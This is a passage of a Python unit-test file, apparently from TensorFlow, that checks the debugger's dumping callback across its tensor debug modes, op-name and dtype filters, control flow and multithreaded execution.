self.assertLen(execution.tensor_protos, 1)
if execution.op_type in ("AddV2", "Mul", "RealDiv"):
# 1st element: -1 is the unset tensor_id for eager op execution.
# 2nd element: 0 means there is no inf or nan.
self.assertAllClose(
tensor_util.MakeNdarray(execution.tensor_protos[0]),
[-1.0, 0.0])
elif tensor_debug_mode == "CONCISE_HEALTH":
self.assertLen(execution.tensor_protos, 1)
if execution.op_type in ("AddV2", "Mul", "RealDiv"):
# 1st element: -1 is the unset tensor_id for eager op execution.
# 2nd element: each scalar tensor has 1 element.
# Remaining elements: no -inf, inf or nan in these
self.assertAllClose(
tensor_util.MakeNdarray(execution.tensor_protos[0]),
[-1, 1, 0, 0, 0])
elif tensor_debug_mode == "SHAPE":
self.assertLen(execution.tensor_protos, 1)
if execution.op_type in ("AddV2", "Mul", "RealDiv"):
# 1st element: -1 is the unset tensor_id for eager op execution.
# 2nd element: dtype enum value (float32).
# 3rd element: rank (scalar).
# 4th element: element count (4).
# Remaining elements: shape at fixed length (6).
self.assertAllClose(
tensor_util.MakeNdarray(execution.tensor_protos[0]),
[-1, 1, 0, 1, 0, 0, 0, 0, 0, 0])
elif tensor_debug_mode == "FULL_TENSOR":
# Under the FULL_TENSOR mode, the value of the tensor should be
# available through `tensor_protos`.
tensor_value = float(
tensor_util.MakeNdarray(execution.tensor_protos[0]))
tensor_values[execution.op_type].append(tensor_value)
# Verify the code_location field.
self.assertTrue(execution.code_location.stack_frame_ids)
for stack_frame_id in execution.code_location.stack_frame_ids:
self.assertIn(stack_frame_id, stack_frame_by_id)
if tensor_debug_mode == "FULL_TENSOR":
self.assertAllClose(tensor_values["Greater"], [1, 1, 1, 1, 1, 1, 0])
self.assertAllClose(tensor_values["RealDiv"], [5, 8, 4, 2, 1])
self.assertAllClose(tensor_values["Mul"], [15])
self.assertAllClose(tensor_values["AddV2"], [16])
self.assertEqual(
executed_op_types,
[
"Greater",
"FloorMod",
"Equal",
"RealDiv", # 10 --> 5
"Greater",
"FloorMod",
"Equal",
"Mul",
"AddV2", # 5 --> 16
"Greater",
"FloorMod",
"Equal",
"RealDiv", # 16 --> 8
"Greater",
"FloorMod",
"Equal",
"RealDiv", # 8 --> 4
"Greater",
"FloorMod",
"Equal",
"RealDiv", # 4 --> 2
"Greater",
"FloorMod",
"Equal",
"RealDiv", # 2 --> 1
"Greater"
])
# Due to the pure eager op execution, the .graph file and the
# .graph_execution_traces file ought to be empty.
graphs_iterator = reader.graphs_iterator()
with self.assertRaises(StopIteration):
next(graphs_iterator)
graph_trace_iter = reader.graph_execution_traces_iterator()
with self.assertRaises(StopIteration):
next(graph_trace_iter)
@parameterized.named_parameters(
("CurtHealth", "CURT_HEALTH"),
("ConciseHealth", "CONCISE_HEALTH"),
("Shape", "SHAPE"),
)
@test_util.run_in_graph_and_eager_modes
def testModesSummarizingBadNumericalValue(self, tensor_debug_mode):
writer = dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode=tensor_debug_mode)
@def_function.function
def func(x, y):
return (x + y) / (x - y)
x = np.array([-3, -1, 0, 0, 1, 1, 1, 2], dtype=np.float16)
y = np.array([2, -1, 0, 0, 1, 1, 1, 3], dtype=np.float16)
# (x + y) / (x - y) = [0.2, -inf, nan, nan, inf, inf, inf, -5].
self.evaluate(func(x, y))
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
stack_frame_by_id = self._readAndCheckSourceFilesAndStackFrames()
(context_ids,
_, op_name_to_op_type, _) = self._readAndCheckGraphsFile(stack_frame_by_id)
(op_names, _, _,
tensor_values) = self._readAndCheckGraphExecutionTracesFile(context_ids)
executed_op_types = [op_name_to_op_type[op_name] for op_name in op_names]
self.assertCountEqual(executed_op_types, ["AddV2", "Sub", "RealDiv"])
if tensor_debug_mode == "CURT_HEALTH":
for op_type, tensor_value in zip(executed_op_types, tensor_values):
self.assertLen(tensor_value, 2)
# 1st element: tensor_id, should be >= 0.
# TODO(cais): Assert on detailed value once Function-graph association
# is in place.
self.assertGreaterEqual(tensor_value[0], 0)
# 2nd element: 0 means there is no inf or nan.
if op_type == "RealDiv":
self.assertEqual(tensor_value[1], 1)
else:
self.assertEqual(tensor_value[1], 0)
elif tensor_debug_mode == "CONCISE_HEALTH":
for op_type, tensor_value in zip(executed_op_types, tensor_values):
self.assertLen(tensor_value, 5)
# 1st element: tensor_id, should be >= 0.
# TODO(cais): Assert on detailed value once Function-graph association
# is in place.
self.assertGreaterEqual(tensor_value[0], 0)
# 2nd element: element count.
self.assertEqual(tensor_value[1], 8)
# Remaining 3 elements: The counts of -inf, inf and nan.
if op_type == "RealDiv":
self.assertAllClose(tensor_value[2:], [1, 3, 2])
else:
self.assertAllClose(tensor_value[2:], [0, 0, 0])
else: # SHAPE.
for op_type, tensor_value in zip(executed_op_types, tensor_values):
self.assertLen(tensor_value, 10)
# 1st element: tensor_id, should be >= 0.
# TODO(cais): Assert on detailed value once Function-graph association
# is in place.
self.assertGreaterEqual(tensor_value[0], 0)
# 2nd element: dtype enum value (float16).
self.assertEqual(tensor_value[1], 19)
# 3rd element: rank (1)
self.assertEqual(tensor_value[2], 1)
# 4th element: element count.
self.assertEqual(tensor_value[3], 8)
# Remaining elements: shape at fixed length.
self.assertAllClose(tensor_value[4:], [8, 0, 0, 0, 0, 0])
@parameterized.named_parameters(
("Shape", "SHAPE"),
)
@test_util.run_in_graph_and_eager_modes
def testBooleanTensors(self, tensor_debug_mode):
writer = dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode=tensor_debug_mode)
@def_function.function
def func(x, y):
return math_ops.logical_not(math_ops.logical_and(x, y))
x = np.array([[False, False], [True, True]], dtype=np.bool)
y = np.array([[False, True], [False, True]], dtype=np.bool)
self.assertAllEqual(
self.evaluate(func(x, y)), [[True, True], [True, False]])
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
stack_frame_by_id = self._readAndCheckSourceFilesAndStackFrames()
(context_ids,
_, op_name_to_op_type, _) = self._readAndCheckGraphsFile(stack_frame_by_id)
(op_names, _, _,
tensor_values) = self._readAndCheckGraphExecutionTracesFile(context_ids)
executed_op_types = [op_name_to_op_type[op_name] for op_name in op_names]
self.assertEqual(executed_op_types, ["LogicalAnd", "LogicalNot"])
for tensor_value in tensor_values:
# 1st element: tensor_id, should be >= 0.
# TODO(cais): Assert on detailed value once Function-graph association
# is in place.
self.assertGreaterEqual(tensor_value[0], 0)
# 2nd element: dtype enum value (bool).
self.assertEqual(tensor_value[1], 10)
# 3rd element: rank (2)
self.assertEqual(tensor_value[2], 2)
# 4th element: element count.
self.assertEqual(tensor_value[3], 4)
# Remaining elements: shape at fixed length.
self.assertAllClose(tensor_value[4:], [2, 2, 0, 0, 0, 0])
@parameterized.named_parameters(
("NoTensor", "NO_TENSOR"),
("CurtHealth", "CURT_HEALTH"),
("ConciseHealth", "CONCISE_HEALTH"),
("Shape", "SHAPE"),
("FullTensor", "FULL_TENSOR"),
)
@test_util.run_in_graph_and_eager_modes
def testNestedFunctionExecutionWithoutControlFlow(self, tensor_debug_mode):
writer = dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode=tensor_debug_mode)
@def_function.function
def log_sum(x, y):
return math_ops.log(x + y)
@def_function.function
def sin1p_log_sum(x, y):
return math_ops.sin(1.0 + log_sum(x, y))
x = constant_op.constant(2.0)
y = constant_op.constant(3.0)
self.assertAllClose(sin1p_log_sum(x, y), np.sin(1.0 + np.log(5.0)))
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
if context.executing_eagerly():
# NOTE(b/142486213): Execution of the TF function happens with
# Session.run() in v1 graph mode, so doesn't get logged to the
# .execution file.
(executed_op_types, executed_graph_ids,
_, _, _, _) = self._readAndCheckExecutionFile()
executed_op_types = [op_type for op_type in executed_op_types
if "sin1p_log_sum" in op_type]
self.assertLen(executed_op_types, 1)
stack_frame_by_id = self._readAndCheckSourceFilesAndStackFrames()
(context_ids, op_types, op_name_to_op_type,
op_name_to_context_id) = self._readAndCheckGraphsFile(stack_frame_by_id)
self.assertIn("AddV2", op_types)
self.assertIn("Log", op_types)
self.assertIn("Sin", op_types)
if context.executing_eagerly():
# Check the correctness of the ID of the executed graph ID.
sin_op_name = [op_name for op_name in op_name_to_op_type
if op_name_to_op_type[op_name] == "Sin"]
self.assertLen(sin_op_name, 1)
sin_context_id = op_name_to_context_id[sin_op_name[0]]
# The executed "op" is a FuncGraph, and its graph ID should have been
# recorded properly and be the ID of the graph that the Sin op belongs to.
executed_graph_ids = [
executed_graph_ids[i] for i, op_type
in enumerate(executed_op_types) if "sin1p_log_sum" in op_type]
self.assertEqual(executed_graph_ids[0], sin_context_id)
(op_names, _, _,
tensor_values) = self._readAndCheckGraphExecutionTracesFile(context_ids)
executed_op_types = [op_name_to_op_type[op_name] for op_name in op_names]
self.assertEqual(executed_op_types, ["AddV2", "Log", "AddV2", "Sin"])
if tensor_debug_mode == "NO_TENSOR":
# Under the default NO_TENSOR tensor-debug mode, the tensor_proto ought to
# be an empty float32 tensor.
for tensor_value in tensor_values:
self.assertEqual(tensor_value.dtype, np.float32)
self.assertEqual(tensor_value.shape, (0,))
elif tensor_debug_mode == "CURT_HEALTH":
for tensor_value in tensor_values:
self.assertLen(tensor_value, 2)
# 1st element: tensor_id, should be >= 0.
# TODO(cais): Assert on detailed value once Function-graph association
# is in place.
self.assertGreaterEqual(tensor_value[0], 0)
# 2nd element: 0 means there is no inf or nan.
self.assertEqual(tensor_value[1], 0)
elif tensor_debug_mode == "CONCISE_HEALTH":
for tensor_value in tensor_values:
self.assertLen(tensor_value, 5)
# 1st element: tensor_id, should be >= 0.
# TODO(cais): Assert on detailed value once Function-graph association
# is in place.
self.assertGreaterEqual(tensor_value[0], 0)
# 2nd element: element count. Remaining elements: all zero because there
# is no -inf, inf or nan.
self.assertAllClose(tensor_value[1:], [1, 0, 0, 0])
elif tensor_debug_mode == "SHAPE":
for tensor_value in tensor_values:
# 1st element: tensor_id, should be >= 0.
# TODO(cais): Assert on detailed value once Function-graph association
# is in place.
self.assertGreaterEqual(tensor_value[0], 0)
# 2nd element: dtype (float32).
self.assertGreaterEqual(tensor_value[1], 1)
# 3rd element: rank (scalar).
self.assertGreaterEqual(tensor_value[2], 0)
# 4th element: element count.
self.assertGreaterEqual(tensor_value[3], 1)
# Remaining elements: shape padded to fixed length.
self.assertAllClose(tensor_value[4:], [0, 0, 0, 0, 0, 0])
elif tensor_debug_mode == "FULL_TENSOR":
self.assertAllClose(tensor_values[0], 5.0) # 1st AddV2 op.
self.assertAllClose(tensor_values[1], np.log(5.0)) # Log op.
self.assertAllClose(tensor_values[2], np.log(5.0) + 1.0) # 2nd AddV2 op.
self.assertAllClose(tensor_values[3],
np.sin(np.log(5.0) + 1.0)) # Sin op.
def testCapturingExecutedGraphIdsOfTwoCompilationsOfSameFunction(self):
"""Test correct executed IDs of two FuncGraphs from the same Py function."""
writer = dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode="NO_TENSOR")
@def_function.function
def ceil_times_two(x):
return math_ops.ceil(x) * 2.0
x_float32 = np.array(3.5, dtype=np.float32)
x_float64 = np.array(4.5, dtype=np.float64)
# Four executions, with two different FuncGraphs, which should lead
# to two unique executed graph IDs (see assertion below).
self.assertAllClose(ceil_times_two(x_float32), 8.0)
self.assertAllClose(ceil_times_two(x_float64), 10.0)
self.assertAllClose(ceil_times_two(x_float32), 8.0)
self.assertAllClose(ceil_times_two(x_float64), 10.0)
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
(executed_op_types, executed_graph_ids,
_, _, _, _) = self._readAndCheckExecutionFile()
self.assertLen(executed_op_types, 4)
for executed_op_type in executed_op_types:
self.assertStartsWith(executed_op_type, "__inference_ceil_times_two_")
self.assertLen(executed_graph_ids, 4)
self.assertEqual(executed_graph_ids[0], executed_graph_ids[2])
self.assertEqual(executed_graph_ids[1], executed_graph_ids[3])
self.assertLen(set(executed_graph_ids), 2)
def testCapturingExecutedGraphIdsOfDuplicateFunctionNames(self):
"""Two FuncGraphs compiled from Python functions with identical names."""
writer = dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode="NO_TENSOR")
class TestClass(object):
@def_function.function
def ceil_times_two(self, x):
return math_ops.ceil(x) * 2.0
# The `ceil_times_two` method of the two objects will be compiled
# into separate FuncGraphs.
test_object_1 = TestClass()
test_object_2 = TestClass()
x = np.array(3.5, dtype=np.float32)
# Four executions, with two different FuncGraphs, which should lead
# to two unique executed graph IDs (see assertion below).
self.assertAllClose(test_object_1.ceil_times_two(x), 8.0)
self.assertAllClose(test_object_2.ceil_times_two(x), 8.0)
self.assertAllClose(test_object_1.ceil_times_two(x), 8.0)
self.assertAllClose(test_object_2.ceil_times_two(x), 8.0)
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
(executed_op_types, executed_graph_ids,
_, _, _, _) = self._readAndCheckExecutionFile()
self.assertLen(executed_op_types, 4)
for executed_op_type in executed_op_types:
self.assertStartsWith(executed_op_type, "__inference_ceil_times_two_")
self.assertLen(executed_graph_ids, 4)
self.assertEqual(executed_graph_ids[0], executed_graph_ids[2])
self.assertEqual(executed_graph_ids[1], executed_graph_ids[3])
self.assertLen(set(executed_graph_ids), 2)
@parameterized.named_parameters(
("AddV2", "AddV2"),
("Log", "Log"),
("AddV2AndLog", "(AddV2|Log)"),
)
@test_util.run_in_graph_and_eager_modes
def testOpRegex(self, op_regex):
writer = dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode="FULL_TENSOR",
op_regex=op_regex)
@def_function.function
def log_sum(x, y):
return math_ops.log(x + y)
@def_function.function
def sin1p_log_sum(x, y):
return math_ops.sin(1.0 + log_sum(x, y))
x = constant_op.constant(2.0)
y = constant_op.constant(3.0)
self.assertAllClose(
self.evaluate(sin1p_log_sum(x, y)), np.sin(1.0 + np.log(5.0)))
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
stack_frame_by_id = self._readAndCheckSourceFilesAndStackFrames()
(context_ids, op_types,
op_name_to_op_type, _) = self._readAndCheckGraphsFile(stack_frame_by_id)
self.assertIn("AddV2", op_types)
self.assertIn("Log", op_types)
self.assertIn("Sin", op_types)
(op_names, _, _,
tensor_values) = self._readAndCheckGraphExecutionTracesFile(context_ids)
executed_op_types = [op_name_to_op_type[op_name] for op_name in op_names]
if op_regex == "AddV2":
self.assertEqual(executed_op_types, ["AddV2", "AddV2"])
self.assertLen(tensor_values, 2)
self.assertAllClose(tensor_values[0], 5.0) # 1st AddV2 op.
self.assertAllClose(tensor_values[1], np.log(5.0) + 1.0) # 2nd AddV2 op.
elif op_regex == "Log":
self.assertEqual(executed_op_types, ["Log"])
self.assertLen(tensor_values, 1)
self.assertAllClose(tensor_values[0], np.log(5.0)) # Log op.
else: # "(AddV2|Log)"
self.assertEqual(executed_op_types, ["AddV2", "Log", "AddV2"])
self.assertLen(tensor_values, 3)
self.assertAllClose(tensor_values[0], 5.0) # 1st AddV2 op.
self.assertAllClose(tensor_values[1], np.log(5.0)) # Log op.
self.assertAllClose(tensor_values[2], np.log(5.0) + 1.0) # 2nd AddV2 op.
def testIncorrectTensorDTypeArgFormatLeadsToError(self):
with self.assertRaisesRegexp(
ValueError,
r".*expected.*list.*tuple.*callable.*but received.*\{\}"):
dumping_callback.enable_dump_debug_info(self.dump_root,
tensor_dtypes=dict())
with self.assertRaisesRegexp(
ValueError,
r".*expected.*list.*tuple.*callable.*but received.*"):
dumping_callback.enable_dump_debug_info(self.dump_root,
tensor_dtypes="float32")
with self.assertRaisesRegexp(
ValueError,
r".*expected.*list.*tuple.*callable.*but received.*"):
dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_dtypes=dtypes.float32)
with self.assertRaises(TypeError):
dumping_callback.enable_dump_debug_info(self.dump_root, tensor_dtypes=[
lambda dtype: dtype.is_floating, lambda dtype: dtype.is_integer])
@parameterized.named_parameters(
("float", [dtypes.float32], None),
("float_only_sum", ["float32"], "Sum"),
("float_no_sum", (dtypes.float32,), "(?!Sum)"),
("int", [dtypes.int32], None),
("int_via_lambda", lambda dtype: dtype.is_integer, None),
("exclude_Sum", None, "(?!Sum)"),
("All", None, None),
)
@test_util.run_in_graph_and_eager_modes
def testTensorDTypesAndOpRegexFilters(self,
tensor_dtypes,
op_regex):
writer = dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode="FULL_TENSOR",
tensor_dtypes=tensor_dtypes,
op_regex=op_regex)
@def_function.function
def unique_sum(xs):
"""Sum over the unique values, for testing."""
unique_xs, indices = array_ops.unique(xs)
return math_ops.reduce_sum(unique_xs), indices
xs = constant_op.constant([2., 6., 8., 1., 2.], dtype=dtypes.float32)
y, indices = self.evaluate(unique_sum(xs))
self.assertAllClose(y, 17.)
self.assertAllEqual(indices, [0, 1, 2, 3, 0])
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
stack_frame_by_id = self._readAndCheckSourceFilesAndStackFrames()
(context_ids, _,
op_name_to_op_type, _) = self._readAndCheckGraphsFile(stack_frame_by_id)
(op_names, _, _,
tensor_values) = self._readAndCheckGraphExecutionTracesFile(context_ids)
executed_op_types = [op_name_to_op_type[op_name] for op_name in op_names]
if tensor_dtypes == [dtypes.float32] and not op_regex:
self.assertEqual(executed_op_types, ["Unique", "Sum"])
self.assertLen(tensor_values, 2)
self.assertAllClose(tensor_values[0], [2., 6., 8., 1.]) # Unique values.
self.assertAllClose(tensor_values[1], 17.) # Sum.
elif tensor_dtypes == ["float32"] and op_regex == "Sum":
self.assertEqual(executed_op_types, ["Sum"])
self.assertLen(tensor_values, 1)
self.assertAllClose(tensor_values[0], 17.) # Sum.
elif tensor_dtypes == (dtypes.float32,) and op_regex == "(?!Sum)":
self.assertEqual(executed_op_types, ["Unique"])
self.assertLen(tensor_values, 1)
self.assertAllClose(tensor_values[0], [2., 6., 8., 1.]) # Unique values.
elif tensor_dtypes == [dtypes.int32] and not op_regex:
self.assertEqual(executed_op_types, ["Unique"])
self.assertLen(tensor_values, 1)
self.assertAllEqual(tensor_values[0], [0, 1, 2, 3, 0]) # Unique indices.
elif callable(tensor_dtypes) and not op_regex:
self.assertEqual(executed_op_types, ["Unique"])
self.assertLen(tensor_values, 1)
self.assertAllEqual(tensor_values[0], [0, 1, 2, 3, 0]) # Unique indices.
elif not tensor_dtypes and op_regex == "(?!Sum)":
self.assertEqual(executed_op_types, ["Unique", "Unique"])
self.assertLen(tensor_values, 2)
self.assertAllClose(tensor_values[0], [2., 6., 8., 1.]) # Unique values.
self.assertAllEqual(tensor_values[1], [0, 1, 2, 3, 0]) # Unique indices.
else: # "All".
self.assertEqual(executed_op_types, ["Unique", "Unique", "Sum"])
self.assertLen(tensor_values, 3)
self.assertAllClose(tensor_values[0], [2., 6., 8., 1.]) # Unique values.
self.assertAllEqual(tensor_values[1], [0, 1, 2, 3, 0]) # Unique indices.
self.assertAllClose(tensor_values[2], 17.) # Sum.
@parameterized.named_parameters(
("NoTensor", "NO_TENSOR"),
("FullTensor", "FULL_TENSOR"),
)
@test_util.run_in_graph_and_eager_modes
def testFunctionExecutionWithControlFlow(self, tensor_debug_mode):
writer = dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode=tensor_debug_mode)
@def_function.function
def iterative_doubling(x, times):
i = constant_op.constant(0, dtype=dtypes.int32)
while i < times:
x = x * 2.0
i += 1
return x
x = constant_op.constant(0.5, dtype=dtypes.float32)
times = constant_op.constant(4, dtype=dtypes.int32)
self.assertAllClose(self.evaluate(iterative_doubling(x, times)), 8.0)
writer.FlushNonExecutionFiles()
stack_frame_by_id = self._readAndCheckSourceFilesAndStackFrames()
# Verify the content of the .graphs file.
context_ids, op_types, op_name_to_op_type, _ = (
self._readAndCheckGraphsFile(stack_frame_by_id))
self.assertIn("Less", op_types)
self.assertIn("Mul", op_types)
self.assertIn("AddV2", op_types)
# Before FlushExecutionFiles() is called, the .execution and
# .graph_execution_traces files should be both empty.
with debug_events_reader.DebugEventsReader(self.dump_root) as reader:
execution_iter = reader.execution_iterator()
graph_execution_traces_iter = reader.graph_execution_traces_iterator()
with self.assertRaises(StopIteration):
next(execution_iter)
with self.assertRaises(StopIteration):
next(graph_execution_traces_iter)
# TODO(cais): Backport execution instrumentation to tf.Session.
writer.FlushExecutionFiles()
# After the flushing, the .execution file should hold the appropriate
# contents.
if context.executing_eagerly():
(executed_op_types, _, input_tensor_ids, output_tensor_ids,
tensor_debug_modes, tensor_values) = self._readAndCheckExecutionFile()
# NOTE(b/142486213): Execution of the TF function happens with
# Session.run() in v1 graph mode, hence it doesn't get logged to the
# .execution file.
self.assertLen(executed_op_types, 1)
self.assertIn("iterative_doubling", executed_op_types[0])
self.assertLen(input_tensor_ids[0], 2)
self.assertLen(output_tensor_ids[0], 1)
self.assertEqual(
tensor_debug_modes[0],
debug_event_pb2.TensorDebugMode.Value(tensor_debug_mode))
if tensor_debug_mode == "FULL_TENSOR":
self.assertAllClose(tensor_values, [[8.0]])
(op_names, _, output_slots,
tensor_values) = self._readAndCheckGraphExecutionTracesFile(context_ids)
executed_op_types = [op_name_to_op_type[op_name] for op_name in op_names]
# The Less op should have been executed 5 times.
self.assertEqual(executed_op_types.count("Less"), 5)
# The last executed op should be Less.
self.assertEqual(executed_op_types[-1], "Less")
# The Mul op should have been executed 4 times.
self.assertEqual(executed_op_types.count("Mul"), 4)
# The AddV2 op should have been run, but we refrain from asserting on how
# many times it's executed.
self.assertIn("AddV2", executed_op_types)
for output_slot in output_slots:
self.assertEqual(output_slot, 0)
if tensor_debug_mode == "NO_TENSOR":
# Under the default NO_TENSOR tensor-debug mode, the tensor_proto ought
# to be an empty float32 tensor.
for tensor_value in tensor_values:
self.assertEqual(tensor_value.dtype, np.float32)
self.assertEqual(tensor_value.shape, (0,))
elif tensor_debug_mode == "CURT_TENSOR":
for tensor_value in tensor_values:
self.assertLen(tensor_value, 2)
# 1st element: tensor_id, should be >= 0.
# TODO(cais): Assert on detailed value once Function-graph association
# is in place.
self.assertGreaterEqual(tensor_value[0], 0)
# 2nd element: 0 means there is no inf or nan.
self.assertEqual(tensor_value[1], 0)
elif tensor_debug_mode == "FULL_TENSOR":
less_values = [
tensor_values[i]
for i, op_type in enumerate(executed_op_types)
if op_type == "Less"
]
self.assertAllClose(less_values, [True, True, True, True, False])
mul_values = [
tensor_values[i]
for i, op_type in enumerate(executed_op_types)
if op_type == "Mul"
]
self.assertAllClose(mul_values, [1.0, 2.0, 4.0, 8.0])
def testCallingEnableTracingTwiceWithTheSameDumpRootIsIdempotent(self):
dumping_callback.enable_dump_debug_info(self.dump_root)
writer = dumping_callback.enable_dump_debug_info(self.dump_root)
x = constant_op.constant([10.0, 12.0, 10.0])
for _ in range(2):
array_ops.unique(x)
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
with debug_events_reader.DebugEventsReader(self.dump_root) as reader:
execution_iter = reader.execution_iterator()
for _ in range(2):
debug_event = next(execution_iter)
self.assertGreater(debug_event.wall_time, 0)
execution = debug_event.execution
self.assertEqual(execution.op_type, "Unique")
self.assertEqual(execution.num_outputs, 2)
self.assertTrue(execution.code_location)
with self.assertRaises(StopIteration):
next(execution_iter)
def testCallingEnableTracingTwiceWithDifferentDumpRootsOverwrites(self):
dumping_callback.enable_dump_debug_info(self.dump_root)
new_dump_root = self.dump_root + "_new_dump_root"
writer = dumping_callback.enable_dump_debug_info(new_dump_root)
x = constant_op.constant([10.0, 12.0, 10.0])
for _ in range(2):
array_ops.unique(x)
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
with debug_events_reader.DebugEventsReader(new_dump_root) as reader:
execution_iter = reader.execution_iterator()
for _ in range(2):
debug_event = next(execution_iter)
self.assertGreater(debug_event.wall_time, 0)
execution = debug_event.execution
self.assertEqual(execution.op_type, "Unique")
self.assertEqual(execution.num_outputs, 2)
self.assertTrue(execution.code_location)
with self.assertRaises(StopIteration):
next(execution_iter)
with debug_events_reader.DebugEventsReader(
self.dump_root) as old_dump_root_reader:
execution_iter = old_dump_root_reader.execution_iterator()
# The old dump root shouldn't have been written to.
with self.assertRaises(StopIteration):
next(execution_iter)
def testCallingEnableRepeatedlyWithDifferentTensorDebugMode(self):
"""Assert that calling enable_dump_debug_info() with different tensor-debug modes.
It should lead to overwriting of the previously-configured mode.
"""
writer = dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode="NO_TENSOR")
@def_function.function
def add_1_divide_by_2(x):
return (x + 1.0) / 2.0
self.assertAllClose(add_1_divide_by_2(constant_op.constant(4.0)), 2.5)
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
stack_frame_by_id = self._readAndCheckSourceFilesAndStackFrames()
context_ids, _, _, _ = self._readAndCheckGraphsFile(stack_frame_by_id)
_, _, _, _, _, tensor_values = self._readAndCheckExecutionFile()
self.assertEqual(tensor_values, [[]])
(_, _, _,
tensor_values) = self._readAndCheckGraphExecutionTracesFile(context_ids)
self.assertLen(tensor_values, 2)
for tensor_value in tensor_values:
self.assertEqual(tensor_value.dtype, np.float32)
self.assertEqual(tensor_value.shape, (0,))
with self.assertRaisesRegexp(
ValueError, r"already.*NO_TENSOR.*FULL_TENSOR.*not be honored"):
dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode="FULL_TENSOR")
@parameterized.named_parameters(
("NoTensor", "NO_TENSOR"),
("FullTensor", "FULL_TENSOR"),
)
def testDisableTracingWorks(self, tensor_debug_mode):
writer = dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode=tensor_debug_mode)
dumping_callback.disable_dump_debug_info()
x = constant_op.constant([10.0, 12.0, 10.0])
for _ in range(2):
array_ops.unique(x)
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
with debug_events_reader.DebugEventsReader(self.dump_root) as reader:
source_files_iter = reader.source_files_iterator()
stack_frames_iter = reader.stack_frames_iterator()
execution_iter = reader.execution_iterator()
# No source-file, stack-frame or execution data should have been dumped.
with self.assertRaises(StopIteration):
next(source_files_iter)
with self.assertRaises(StopIteration):
next(stack_frames_iter)
with self.assertRaises(StopIteration):
next(execution_iter)
@parameterized.named_parameters(
("NoTensor", "NO_TENSOR"),
("CurtHealth", "CURT_HEALTH"),
("ConciseHealth", "CONCISE_HEALTH"),
("Shape", "SHAPE"),
("FullTensor", "FULL_TENSOR"),
)
def testMultiThreadedExecutionWithSameSetting(self, tensor_debug_mode):
"""Dumping from multiple threads using the same setting."""
writer = dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode=tensor_debug_mode)
x = variables.Variable(10.0, dtype=dtypes.float32)
y = variables.Variable(3.0, dtype=dtypes.float32)
@def_function.function
def increase_x():
return x.assign_add(y * 2.0)
increase_x()
num_threads = 3
threads = []
for _ in range(num_threads):
threads.append(threading.Thread(target=increase_x))
for thread in threads:
thread.start()
for thread in threads:
thread.join()
# 10 --> 16 --> 22 --> 28 --> 34.
self.assertAllClose(x.read_value(), 34.0)
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
stack_frame_by_id = self._readAndCheckSourceFilesAndStackFrames()
with debug_events_reader.DebugEventsReader(self.dump_root) as reader:
execution_iter = reader.execution_iterator()
prev_wall_time = 1
for debug_event in execution_iter:
self.assertGreaterEqual(debug_event.wall_time, prev_wall_time)
prev_wall_time = debug_event.wall_time
(context_ids, _,
op_name_to_op_type, _) = self._readAndCheckGraphsFile(stack_frame_by_id)
(op_names, _, output_slots,
tensor_values) = self._readAndCheckGraphExecutionTracesFile(context_ids)
executed_op_types = [op_name_to_op_type[op_name] for op_name in op_names]
self.assertEqual(executed_op_types.count("Mul"), 1 + num_threads)
self.assertEqual(
executed_op_types.count("ReadVariableOp"), 2 * (1 + num_threads))
for output_slot in output_slots:
self.assertEqual(output_slot, 0)
if tensor_debug_mode == "NO_TENSOR":
for tensor_value in tensor_values:
self.assertEqual(tensor_value.dtype, np.float32)
self.assertEqual(tensor_value.shape, (0,))
elif tensor_debug_mode == "CURT_HEALTH":
for tensor_value in tensor_values:
self.assertLen(tensor_value, 2)
# 1st element: tensor_id, should be >= 0.
# TODO(cais): Assert on detailed value once Function-graph association
# is in place.
self.assertGreaterEqual(tensor_value[0], 0)
# 2nd element: 0 means there is no inf or nan.
self.assertEqual(tensor_value[1], 0)
elif tensor_debug_mode == "CONCISE_HEALTH":
for tensor_value in tensor_values:
self.assertLen(tensor_value, 5)
# 1st element: tensor_id, should be >= 0.
# TODO(cais): Assert on detailed value once Function-graph association
# is in place.
self.assertGreaterEqual(tensor_value[0], 0)
# 2nd element: element count. Remaining elements: all zero because there
# is no -inf, inf or nan.
self.assertAllClose(tensor_value[1:], [1, 0, 0, 0])
elif tensor_debug_mode == "SHAPE":
mul_values = [
tensor_values[i]
for i, op_type in enumerate(executed_op_types)
if op_type == "Mul"
]
for mul_value in mul_values:
# 1st element: tensor_id, should be >= 0.
# TODO(cais): Assert on detailed value once Function-graph association
# is in place.
self.assertGreaterEqual(mul_value[0], 0)
# 2nd element: dtype enum value (float32).
self.assertEqual(mul_value[1], 1)
# 3rd element: rank.
self.assertEqual(mul_value[2], 0)
# 3rd element: element count.
self.assertEqual(mul_value[3], 1)
# Remaining elements: shape padded to a fixed length.
self.assertAllClose(mul_value[4:], [0, 0, 0, 0, 0, 0])
elif tensor_debug_mode == "FULL_TENSOR":
mul_values = [
tensor_values[i]
for i, op_type in enumerate(executed_op_types)
if op_type == "Mul"
]
self.assertAllClose(mul_values, [6.0, 6.0, 6.0, 6.0])
def testMultiThreadedDumpingWithDifferentSettings(self):
dump_root_1 = os.path.join(self.dump_root, "dump_root_1")
dump_root_2 = os.path.join(self.dump_root, "dump_root_2")
